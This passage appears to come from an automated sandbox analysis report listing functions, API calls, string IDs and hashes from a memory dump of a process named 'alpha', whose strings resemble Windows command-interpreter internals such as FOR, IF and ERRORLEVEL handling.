                                                                              • API ID: InformationProcess$CurrentDirectoryQuery_setjmp_wcsnicmpwcsrchr
                                                                              • String ID: %9d
                                                                              • API String ID: 1006866328-2241623522
                                                                              • Opcode ID: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
                                                                              • Instruction ID: 96f7c6f0b9e914580af8da4ea81904e43cae778264fa8755bf0729cd7e42fc09
                                                                              • Opcode Fuzzy Hash: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
                                                                              • Instruction Fuzzy Hash: 37515E72A0C6428AE708BF51E8405A9B7A4FB4C768F445635DA3D937B6CF7CE505CB10
                                                                              Function 00007FF64B569B50 Relevance: 7.8, APIs: 5, Instructions: 252COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$AllocateProcess
                                                                              • String ID:
                                                                              • API String ID: 1357844191-0
                                                                              • Opcode ID: 3743209a10b96ebcc181eebe11116311313ddf8ce3d63fdcd25b8e532d2a8f02
                                                                              • Instruction ID: 19473c67f3ab8c86f3a72e33b2968d20a698f7508df448ca0951b9bf2e49e812
                                                                              • Opcode Fuzzy Hash: 3743209a10b96ebcc181eebe11116311313ddf8ce3d63fdcd25b8e532d2a8f02
                                                                              • Instruction Fuzzy Hash: 15A15F21B1C64286FA58BF25E451679B6A1FF9C780F449135DE6EC77B6DE3CE8018700
                                                                              Function 00007FF64B56D250 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: _wcsicmp
                                                                              • String ID: GeToken: (%x) '%s'
                                                                              • API String ID: 2081463915-1994581435
                                                                              • Opcode ID: e3a6cb9c4f4fe1a277f0a8ebff47e1c814c31c2abc96469986f3b1ea96a28bad
                                                                              • Instruction ID: 5d8c9cfa1363cc4c7856ae7e877b170e1ec5d7da771a4c495bac615dcc369b62
                                                                              • Opcode Fuzzy Hash: e3a6cb9c4f4fe1a277f0a8ebff47e1c814c31c2abc96469986f3b1ea96a28bad
                                                                              • Instruction Fuzzy Hash: F0718B20E0D68685FB6CBF68E844279B6A0AF1C750F546935D53EC66F3EF7CA8818740
                                                                              Function 00007FF64B5863FC Relevance: 4.7, APIs: 3, Instructions: 179threadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentDebugDebuggerOutputPresentStringThread
                                                                              • String ID:
                                                                              • API String ID: 4268342597-0
                                                                              • Opcode ID: dd079414f8549339cb4fded4247a4dbae90aea18fcb15bc8c39707241a1b23ff
                                                                              • Instruction ID: 714fba376f185e127b50bb2ea7383be33fa188cff2b4eb804aa93f92d3d311d0
                                                                              • Opcode Fuzzy Hash: dd079414f8549339cb4fded4247a4dbae90aea18fcb15bc8c39707241a1b23ff
                                                                              • Instruction Fuzzy Hash: 8D816C62A1C78281EB68BF26E440239B7A0FF4DB84F185535CA6D83776DF7DE8518700
                                                                              Function 00007FF64B56F8C0 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 380COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00000000,?,00007FF64B56F52A,00000000,00000000,?,00000000,?,00007FF64B56E626,?,?,00000000,00007FF64B571F69), ref: 00007FF64B56F8DE
                                                                              • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF64B571F69,?,?,?,?,?,?,?,00007FF64B56286E,00000000,00000000,00000000,00000000), ref: 00007FF64B56F8FB
                                                                              • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF64B571F69,?,?,?,?,?,?,?,00007FF64B56286E,00000000,00000000,00000000,00000000), ref: 00007FF64B56F951
                                                                              • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF64B571F69,?,?,?,?,?,?,?,00007FF64B56286E,00000000,00000000,00000000,00000000), ref: 00007FF64B56F96B
                                                                              • wcschr.MSVCRT ref: 00007FF64B56FA8E
                                                                              • _get_osfhandle.MSVCRT ref: 00007FF64B56FB14
                                                                              • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00007FF64B571F69,?,?,?,?,?,?,?,00007FF64B56286E,00000000,00000000,00000000,00000000), ref: 00007FF64B56FB2D
                                                                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF64B571F69,?,?,?,?,?,?,?,00007FF64B56286E,00000000,00000000,00000000,00000000), ref: 00007FF64B56FBEA
                                                                              • _get_osfhandle.MSVCRT ref: 00007FF64B56F996
                                                                                • Part of subcall function 00007FF64B570010: SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF64B58849D,?,?,?,00007FF64B58F0C7), ref: 00007FF64B570045
                                                                                • Part of subcall function 00007FF64B570010: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF64B58F0C7,?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF64B58E964), ref: 00007FF64B570071
                                                                                • Part of subcall function 00007FF64B570010: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF64B570092
                                                                                • Part of subcall function 00007FF64B570010: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF64B5700A7
                                                                                • Part of subcall function 00007FF64B570010: MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF64B570181
                                                                              • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF64B571F69,?,?,?,?,?,?,?,00007FF64B56286E,00000000,00000000,00000000,00000000), ref: 00007FF64B57D401
                                                                              • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF64B571F69,?,?,?,?,?,?,?,00007FF64B56286E,00000000,00000000,00000000,00000000), ref: 00007FF64B57D41B
                                                                              • longjmp.MSVCRT(?,?,00000000,00007FF64B571F69,?,?,?,?,?,?,?,00007FF64B56286E,00000000,00000000,00000000,00000000), ref: 00007FF64B57D435
                                                                              • longjmp.MSVCRT(?,?,00000000,00007FF64B571F69,?,?,?,?,?,?,?,00007FF64B56286E,00000000,00000000,00000000,00000000), ref: 00007FF64B57D480
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection$EnterFileLeave$LockPointerShared_get_osfhandlelongjmp$AcquireByteCharErrorLastMultiReadReleaseWidewcschr
                                                                              • String ID: =,;
                                                                              • API String ID: 3964947564-1539845467
                                                                              • Opcode ID: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
                                                                              • Instruction ID: 421f77af8a3c3a21ca19ad1f52935a35acb7f09422c5c15793e4559b239ac18e
                                                                              • Opcode Fuzzy Hash: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
                                                                              • Instruction Fuzzy Hash: 25024661A0DA42CAEA1CBF21E840278F6A1BF8DB54F549135D93ED62F6DF3DA401CB10
                                                                              Function 00007FF64B5702A0 Relevance: 35.3, APIs: 13, Strings: 7, Instructions: 279COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: _wcsicmp$iswspacewcschr
                                                                              • String ID: ;$=,;$FOR$FOR/?$IF/?$REM$REM/?
                                                                              • API String ID: 840959033-3627297882
                                                                              • Opcode ID: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                                                                              • Instruction ID: f4b2be1440e4a2e176c166eac6cca841f39d128a833dca5544816be94ce614fd
                                                                              • Opcode Fuzzy Hash: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                                                                              • Instruction Fuzzy Hash: FAD16B61E0C643C6FB6CBF25E8152B9A6A1AF4CB44F449035DA2DC62B7DF7CE8458710
                                                                              Function 00007FF64B56EF40 Relevance: 33.7, APIs: 16, Strings: 3, Instructions: 465COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: iswdigitiswspacewcschr
                                                                              • String ID: ()|&=,;"$=,;$Ungetting: '%s'
                                                                              • API String ID: 1595556998-2755026540
                                                                              • Opcode ID: 78b794f6fc69934632e6eee377604cec53d1945fb932c7168ee33591e32c1865
                                                                              • Instruction ID: 504bfa70ac971cd2f40a3c916c3831cbd9298853d9427b2aaa16edaa6a76596a
                                                                              • Opcode Fuzzy Hash: 78b794f6fc69934632e6eee377604cec53d1945fb932c7168ee33591e32c1865
                                                                              • Instruction Fuzzy Hash: C1226BA5E0D75685FA6C7F25E884279F6A0BF0D790F40A132D9ADC62F6DF3CA4418B10
                                                                              Function 00007FF64B57081C Relevance: 33.4, APIs: 12, Strings: 7, Instructions: 130COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: _wcsicmp$EnvironmentVariable
                                                                              • String ID: CMDCMDLINE$CMDEXTVERSION$DATE$ERRORLEVEL$HIGHESTNUMANODENUMBER$RANDOM$TIME
                                                                              • API String ID: 198002717-2301591722
                                                                              • Opcode ID: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
                                                                              • Instruction ID: f808de9d64bcffd8169ddeeebaee65ca474548aaa856adfab1ed2f799f13d13d
                                                                              • Opcode Fuzzy Hash: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
                                                                              • Instruction Fuzzy Hash: 8B51ECA5B0C643C6E658BF65E810179EBA1EF4DB81F48A075CA2E836B6DF6CE444C740
                                                                              Function 00007FF64B56D3F0 Relevance: 31.8, APIs: 16, Strings: 2, Instructions: 310memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$Processwcschr$Alloc$Sizeiswspace
                                                                              • String ID: "$=,;
                                                                              • API String ID: 3545743878-4143597401
                                                                              • Opcode ID: b3fa525c0aa7c573df7f7b2f39b769da54eaf45f3e5e9f5bf37a15d8f9aec30a
                                                                              • Instruction ID: c3fc958a915f324581675012c1bd4257988e8b7490f497a7f3ed3a9524743fda
                                                                              • Opcode Fuzzy Hash: b3fa525c0aa7c573df7f7b2f39b769da54eaf45f3e5e9f5bf37a15d8f9aec30a
                                                                              • Instruction Fuzzy Hash: 10C19C61A0DA5282EB6D7F11D000379F6A0FF5DB45F04A835CA6E827F6EF7CA445D200
                                                                              Function 00007FF64B585BF4 Relevance: 26.4, APIs: 2, Strings: 13, Instructions: 153windowthreadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentFormatMessageThread
                                                                              • String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%u)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
                                                                              • API String ID: 2411632146-3173542853
                                                                              • Opcode ID: fb2fb1c3bf230b004cc3ce09a0c69924bb125e2a6cca917ccdca682aa570422a
                                                                              • Instruction ID: 353ffd8731c63b0e481621a846066d8f4ea9beceb2fdf178cca84931b9696630
                                                                              • Opcode Fuzzy Hash: fb2fb1c3bf230b004cc3ce09a0c69924bb125e2a6cca917ccdca682aa570422a
                                                                              • Instruction Fuzzy Hash: 7C616BA1A2D782C1EA68FF51E4041A5A7A0FB4CB88F440536DE2D87776CF3CE6658B00
                                                                              Function 00007FF64B5726E0 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 187fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFile_open_osfhandle
                                                                              • String ID: con
                                                                              • API String ID: 2905481843-4257191772
                                                                              • Opcode ID: 3459eb2e79cd0d2b6a799ffdb85acc031fe8388b8b96825e157d57a9e1669ecc
                                                                              • Instruction ID: 6ba494bca276d72e9774ba4305e3f71ecdfb98036bcecbecf68fdd85987393aa
                                                                              • Opcode Fuzzy Hash: 3459eb2e79cd0d2b6a799ffdb85acc031fe8388b8b96825e157d57a9e1669ecc
                                                                              • Instruction Fuzzy Hash: B9717172B0C681CAE764BF14F440679FAA0FB8EB61F548234DA6E826B5DF7DD4458B00
                                                                              Function 00007FF64B5893E8 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 168COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: ConsoleMode$Handle$wcsrchr$CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailureiswspacewcschr
                                                                              • String ID:
                                                                              • API String ID: 3829876242-3916222277
                                                                              • Opcode ID: 10a5b567e72863909b04e51aaf43edd524101fd282eaa5692d28ef0ea38d911e
                                                                              • Instruction ID: 6f95ce807a5968700f4bdc64b71c199c9d12692151fd98ddc97fc598f9ba0539
                                                                              • Opcode Fuzzy Hash: 10a5b567e72863909b04e51aaf43edd524101fd282eaa5692d28ef0ea38d911e
                                                                              • Instruction Fuzzy Hash: 2B617D22A1C642C6EA18BF12D40417AB7A0FF8DB94F459134DA2E837A6DF3CE9058B00
                                                                              Function 00007FF64B591A40 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 148COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: _wcsicmpmemset$Volume$DriveInformationNamePathType
                                                                              • String ID: CSVFS$NTFS$REFS
                                                                              • API String ID: 3510147486-2605508654
                                                                              • Opcode ID: 16da7e415156957614f2e65e2147701ecc6f9267ccedce46241fe4d5de2b202f
                                                                              • Instruction ID: c957023f31f3281c1313d8f512ccf751226a479105bf3a0297e010df963bfa69
                                                                              • Opcode Fuzzy Hash: 16da7e415156957614f2e65e2147701ecc6f9267ccedce46241fe4d5de2b202f
                                                                              • Instruction Fuzzy Hash: 0D616F72708BC2DAEB69AF21D8443E9B7A4FB49B84F449135CA1D8B769DF78D204C700
                                                                              Function 00007FF64B5672B0 Relevance: 21.3, APIs: 1, Strings: 11, Instructions: 283COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • longjmp.MSVCRT(?,00000000,00000000,00007FF64B567279,?,?,?,?,?,00007FF64B56BFA9), ref: 00007FF64B584485
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: longjmp
                                                                              • String ID: == $EQU $FOR$FOR /?$GEQ $GTR $IF /?$LEQ $LSS $NEQ $REM /?
                                                                              • API String ID: 1832741078-366822981
                                                                              • Opcode ID: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                                                              • Instruction ID: b2a814f1c05ce27a6c3bd5c7ee23b2435e739b361f6a4d5c7a09bcc8450fcfc2
                                                                              • Opcode Fuzzy Hash: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                                                              • Instruction Fuzzy Hash: D0C17A60F1C642C1E62CFF1AE5946BCA791AB4EB84F905136DD2DD36B7CF2CA8568340
                                                                              Function 00007FF64B56B998 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 275COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: Heapwcschr$AllocateProcessmemset
                                                                              • String ID: -$:.\$=,;$=,;+/[] "
                                                                              • API String ID: 2060774286-969133440
                                                                              • Opcode ID: 7b3217b0480b3f12f234bd17b6b4b81bb5ac0aea220cc5327607834eba670ac4
                                                                              • Instruction ID: e0db9839304129c6e3fd933131e4b5be3774ae694d2c61209a0e3586cc87fce8
                                                                              • Opcode Fuzzy Hash: 7b3217b0480b3f12f234bd17b6b4b81bb5ac0aea220cc5327607834eba670ac4
                                                                              • Instruction Fuzzy Hash: C2B18121A0DA8282FA68BF15D145279A7A0FF4CB80F556235CA6EC77F6DF7CE8458700
                                                                              Function 00007FF64B5903AC Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 219COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: memset$ErrorLast$InformationVolume
                                                                              • String ID: %04X-%04X$~
                                                                              • API String ID: 2748242238-2468825380
